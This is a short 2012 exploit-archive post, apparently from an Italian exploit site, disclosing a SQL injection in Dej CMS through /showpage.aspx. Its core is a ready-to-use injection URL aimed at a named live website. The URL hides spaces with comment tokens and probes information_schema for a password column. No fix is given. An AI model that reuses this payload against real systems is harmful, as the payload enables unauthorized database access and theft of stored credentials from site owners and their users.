Dej Cms [SQL Inject]

2012-03-05 19:39:58
Inviato da: Expl0its

# Exploit Title: Dej Cms [SQL Inject]
# Date: [2012.3.5]
# Author: Expl0its
# We Are : Expl0its , Higher_sense , Black.spook & H4ckcity.net - zone-hc.com
# Gmail : [email protected]
# Software : [http://www.dejcom.com]



Vulnerable Page:

/showpage.aspx



Exploit:

http://www.shahmiri.com/showpage.aspx?id='/**/or/**/1=(select/**/top/**/1/**/table_name/**/from/**/information_schema.columns/**/where/**/column_name/**/like/**/'pass')--

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.